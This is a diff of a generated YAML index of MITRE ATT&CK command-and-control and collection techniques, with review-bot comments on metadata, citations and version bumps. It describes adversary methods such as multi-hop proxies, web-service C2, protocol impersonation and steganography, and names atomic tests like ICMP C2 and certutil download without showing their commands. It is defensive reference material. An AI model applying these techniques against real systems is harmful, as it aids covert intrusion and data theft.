Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -63330,8 +63799,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1568:
technique:
@@ -63369,7 +63836,7 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:26:23.782Z'
name: Dynamic Resolution
description: |-
Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -63397,42 +63864,22 @@ command-and-control:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1102:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Anastasios Pingios
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- created: '2017-05-31T21:31:13.915Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1102
- url: https://attack.mitre.org/techniques/T1102
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-07T17:53:54.380Z'
name: Web Service
description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Sarathkumar Rajendran, Microsoft Defender365
+ x_mitre_deprecated: false
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
@@ -63441,17 +63888,39 @@ command-and-control:
for uncommon data flows (e.g., a client sending significantly more data than
it receives from a server). User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created: '2017-05-31T21:31:13.915Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1102
+ external_id: T1102
+ - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+ description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+ Graph API for C&C communication. Retrieved July 1, 2024.
+ url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
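Review bot: `x_mitre_permissions_required: [User]` disappears from T1102 in this hunk while T1205.001, T1102.003 and T1132.002 later in the patch keep it. If that mirrors the upstream bundle it is fine, but the key reordering in this hunk (`type`, `id`, `created`, `external_references` all moved to the end) makes it hard to tell a filtered field from a reordered one; regenerating from a pinned bundle version, or noting the version in the commit message, would make the change reviewable. The new `(Citation: Broadcom BirdyClient Microsoft Graph API 2024)` in the description does have its matching `external_references` entry here, and the `x_mitre_version` bump 1.1 → 1.2 is consistent with the description change.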
T1568.003:
technique:
@@ -63483,7 +63952,7 @@ command-and-control:
description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
Operations. Retrieved March 6, 2017.
url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T20:54:28.287Z'
name: DNS Calculation
description: |-
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -63500,8 +63969,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1104:
technique:
@@ -63521,7 +63988,7 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1104
external_id: T1104
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:43:38.181Z'
name: Multi-Stage Channels
description: |-
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -63544,8 +64011,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1205.001:
technique:
@@ -63570,7 +64035,7 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -63595,8 +64060,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.002:
technique:
@@ -63661,7 +64124,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1102.003:
technique:
@@ -63685,7 +64147,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:26:10.109Z'
name: One-Way Communication
description: |-
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -63710,21 +64172,36 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.003:
technique:
- modified: '2024-04-19T13:24:36.872Z'
+ modified: '2024-09-25T20:48:24.411Z'
name: 'Proxy: Multi-hop Proxy'
- description: |-
- Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
- For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
- In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
-
- Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+ description: "Adversaries may chain together multiple proxies to disguise the
+ source of malicious traffic. Typically, a defender will be able to identify
+ the last proxy traffic traversed before it enters their network; the defender
+ may or may not be able to identify any previous proxies before the last-hop
+ proxy. This technique makes identifying the original source of the malicious
+ traffic even more difficult by requiring the defender to trace malicious traffic
+ through several proxies to identify its source.\n\nFor example, adversaries
+ may construct or use onion routing networks – such as the publicly available
+ [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+ C2 traffic through a compromised population, allowing communication with any
+ device within the network.(Citation: Onion Routing) Adversaries may also use
+ operational relay box (ORB) networks composed of virtual private servers (VPS),
+ Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+ obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+ infrastructure, it is possible for an adversary to leverage multiple compromised
+ devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+ By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ on routers, adversaries can add custom code to the affected network devices
+ that will implement onion routing between those nodes. This method is dependent
+ upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+ method allowing the adversaries to cross the protected network boundary of
+ the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+ \ Protocols such as ICMP may be used as a transport. \n\nSimilarly, adversaries
+ may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+ routing between a decentralized network of peers.(Citation: NGLite Trojan)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
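Review bot: the regenerated T1090.003 description carries an escaped space (`\ Protocols such as ICMP`) inside the double-quoted scalar and a trailing space in `(Citation: ORB Mandiant) \n\n`; both render as double spaces in the text. They come from the upstream description rather than from this patch, so do not hand-edit the generated YAML, but they are worth reporting upstream. The switch from the `|-` block scalar to a double-quoted scalar with `\n\n` escapes is otherwise equivalent, so the content change is only the added ORB sentence and its citation, which matches the `x_mitre_version` 2.1 → 2.2 bump and the `ORB Mandiant` reference added in the following hunks.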
@@ -63743,7 +64220,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -63757,6 +64234,11 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1090/003
external_id: T1090.003
+ - source_name: ORB Mandiant
+ description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+ Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+ July 8, 2024.
+ url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
- source_name: NGLite Trojan
description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -63770,7 +64252,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.003
atomic_tests:
- name: Psiphon
@@ -63857,7 +64338,7 @@ command-and-control:
elevation_required: false
T1001:
technique:
- modified: '2024-02-02T19:04:35.389Z'
+ modified: '2024-10-07T15:07:47.232Z'
name: Data Obfuscation
description: 'Adversaries may obfuscate command and control traffic to make
it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -63907,11 +64388,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1571:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:37:57.868Z'
name: Non-Standard Port
description: |-
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -63920,20 +64400,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
@@ -63958,17 +64438,16 @@ command-and-control:
url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
- source_name: Fortinet Agent Tesla April 2018
description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
Variant. Retrieved November 5, 2018.
url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1571
atomic_tests:
- name: Testing usage of uncommonly used port with PowerShell
@@ -64045,7 +64524,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1573
atomic_tests:
- name: OpenSSL C2
@@ -64109,7 +64587,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:15:47.861Z'
name: Bidirectional Communication
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
@@ -64146,8 +64624,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1573.002:
technique:
@@ -64201,7 +64677,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1095:
technique:
@@ -64273,7 +64748,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1095
atomic_tests:
- name: ICMP C2
@@ -64361,28 +64835,8 @@ command-and-control:
name: powershell
T1001.003:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
- type: attack-pattern
- created: '2020-03-15T00:40:27.503Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1001.003
- url: https://attack.mitre.org/techniques/T1001/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
- name: Protocol Impersonation
+ modified: '2024-10-09T15:40:19.436Z'
+ name: Protocol or Service Impersonation
description: "Adversaries may impersonate legitimate protocols or web service
traffic to disguise command and control activity and thwart analysis efforts.
By impersonating legitimate protocols or web services, adversaries can make
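Review bot: `name` for T1001.003 changes from "Protocol Impersonation" to "Protocol or Service Impersonation" in this hunk, which agrees with the link text updated in the T1572 description earlier in this patch. Any other generated artifact that embeds the technique name string needs to be regenerated from the same bundle in this change, otherwise the name will disagree across files until the next regeneration.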
@@ -64390,23 +64844,61 @@ command-and-control:
\ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
like subsequent traffic is SSL/TLS encrypted, potentially interfering with
some security tooling, or to make the traffic look like it is related with
- a trusted entity. "
+ a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+ impersonate expected web traffic or trusted services. For example, adversaries
+ may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+ data to disguise C2 communications or mimic legitimate services such as Gmail,
+ Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+ Malleable-C2-U42)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - James Emery-Callcott, Emerging Threats Team, Proofpoint
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+ created: '2020-03-15T00:40:27.503Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1001/003
+ external_id: T1001.003
+ - source_name: Malleable-C2-U42
+ description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+ Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+ How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+ September 24, 2024.'
+ url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ - source_name: ESET Okrum July 2019
+ description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+ RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
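Review bot: the two new `(Citation: ESET Okrum July 2019)` and `(Citation: Malleable-C2-U42)` keys in the description both have matching `external_references` entries in this hunk, and the `x_mitre_version` 1.0 → 2.0 bump is consistent with the renamed technique and extended description. The `Malleable-C2-U42` entry lists its authors without separators ("Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu ..."), which is how the upstream bundle has it; flag that upstream rather than hand-fixing the generated YAML.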
T1090.004:
technique:
@@ -64453,7 +64945,6 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1132:
technique:
@@ -64513,7 +65004,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.002:
technique:
@@ -64545,7 +65035,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-14T23:39:50.117Z'
name: Non-Standard Encoding
description: 'Adversaries may encode data with a non-standard data encoding
system to make the content of command and control traffic more difficult to
@@ -64571,8 +65061,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.001:
technique:
@@ -64639,7 +65127,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.001
atomic_tests:
- name: Malicious User Agents - Powershell
@@ -64794,7 +65281,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1105
atomic_tests:
- name: certutil download (urlcache)
@@ -65890,7 +66376,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1001.002:
technique:
@@ -65914,7 +66399,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-15T00:37:58.963Z'
name: Data Obfuscation via Steganography
description: 'Adversaries may use steganographic techniques to hide command
and control traffic to make detection efforts more difficult. Steganographic
@@ -65937,8 +66422,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1001.002
atomic_tests:
- name: Steganographic Tarball Embedding
@@ -66111,7 +66594,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:49:47.340Z'
name: Fallback Channels
description: Adversaries may use fallback or alternate communication channels
if the primary channel is compromised or inaccessible in order to maintain
@@ -66131,8 +66614,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.001:
technique:
@@ -66186,7 +66667,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.001
atomic_tests:
- name: portproxy reg key
@@ -66244,7 +66724,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:12:30.499Z'
name: Dead Drop Resolver
description: |-
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -66270,8 +66750,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1001.001:
technique:
@@ -66325,7 +66803,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
collection:
T1560.001:
@@ -66401,7 +66878,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560.001
atomic_tests:
- name: Compress Data for Exfiltration With Rar
@@ -66724,7 +67200,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1113
atomic_tests:
- name: Windows Screencapture
@@ -66892,7 +67367,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.001:
technique:
@@ -66971,7 +67445,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests:
- name: Input Capture
@@ -67046,7 +67519,7 @@ collection:
